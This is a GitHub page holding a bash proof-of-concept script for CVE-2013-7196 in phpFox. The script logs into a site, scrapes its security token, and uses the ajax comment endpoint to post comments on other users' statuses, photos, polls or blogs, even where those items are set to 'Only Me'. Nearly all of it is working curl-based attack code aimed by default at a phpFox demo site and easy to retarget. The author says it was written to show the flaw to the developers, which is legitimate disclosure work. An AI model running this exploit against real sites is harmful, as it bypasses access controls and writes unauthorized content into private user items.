-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2013-7196.bash
executable file
·90 lines (78 loc) · 2.94 KB
/
CVE-2013-7196.bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/bin/bash
# This script was developed for demonstrat development team
# phpFox of the problem, can be easily adapted for testing
# other applications that use the framework, just by adjusting
# the variable "${TARGET}"
#
# Comments are published with the credentials defined on variables
#
# USERACCOUNT = "your_mail%40example.com"
# USERPASSWD = "your_password"
#
# even in the absence relationship between users or publication
# being set to "Only Me" in the case is the focus of this study,
# the review will be added.
#
# Wesley Henrique Leite
# wesleyhenrique **(A)** gmail **NOSPAM** com
# wesley **(A)** telapreta **NOSPAM** com **NOSPAM** br
#
# USAGE:
# $ CVE-2013-7196.bash <user_status|photo|music_song|poll|link|blog> 777 'Hello all'
#
#AUTH
# encode
# @ = %40 -> teste%40example.com
USERACCOUNT=""
USERPASSWD=""
COOKIE=cookie.txt
SECTOKEN=""
TYPE="$1"
ITEM_ID=$2
MSG="$3"
TARGET="http://demo.phpfox.com"
URL_LOGIN="${TARGET}/user/login"
URL_AJAX="${TARGET}/static/ajax.php"
USER_AGENT="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
USAGE="Type Item_id and MSG is required\n $0 <user_status|photo|music_song|poll|link|blog> 777 'Hello all' "
[ -z "${USERACCOUNT}" -o \
-z "${USERPASSWD}" ] && {
echo "Open $0 file and edit USERACCOUNT and USERPASSWD"
exit
}
[ $# -eq 3 -a \
! -z "${TYPE}" -a \
! -z "${ITEM_ID}" -a \
! -z "${MSG}" ] || { echo -e "${USAGE}" ; exit ; }
>${COOKIE}
# GET COOKIE AND SECURITY_TOKEN
SECTOKEN=$(curl -D ${COOKIE} ${TARGET} |
grep 'security_token' |
grep -Ewo '([a-f0-9A-F]){32}' |
sort -u)
# AUTH USER
# SAVE COOKIE
curl "${URL_LOGIN}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H 'Accept-Encoding: gzip,deflate,sdch' \
-H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.6,en;q=0.4' \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
-H 'Cache-Control: max-age=0' \
-H 'Connection: keep-alive' \
-D ${COOKIE} \
--data "core%5Bsecurity_token%5D=${SECTOKEN}&val%5Blogin%5D=${USERACCOUNT}&val%5Bremember_me%5D=&val%5Bpassword%5D=${USERPASSWD}" \
--compressed
### COMMENT ADD
curl "${URL_AJAX}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Connection: keep-alive' \
--data "&core[ajax]=true&core[call]=comment.add&core[security_token]=${SECTOKEN}&val[type]=${TYPE}&val[item_id]=${ITEM_ID}&val[parent_id]=0&val[is_via_feed]=${ITEM_ID}&val[default_feed_value]=Write%20a%20comment...&val[text]=${MSG}&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290" \
--compressed